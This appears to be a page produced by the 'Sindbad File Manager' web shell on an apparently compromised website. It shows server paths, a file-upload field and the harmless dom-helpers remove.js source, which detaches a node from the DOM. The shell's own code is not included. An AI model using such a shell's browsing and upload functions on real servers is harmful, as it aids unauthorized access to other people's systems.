Duffer Derek

Current Path : /var/www/sitesecurity.bitkit.dk/httpdocs/node_modules/dom-helpers/cjs/
Upload File :
Current File : /var/www/sitesecurity.bitkit.dk/httpdocs/node_modules/dom-helpers/cjs/remove.js

"use strict";

exports.__esModule = true;
exports.default = remove;

/**
 * Removes a given node from the DOM.
 * 
 * @param node the node to remove
 */
function remove(node) {
  if (node && node.parentNode) {
    node.parentNode.removeChild(node);
    return node;
  }

  return null;
}

module.exports = exports["default"];

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists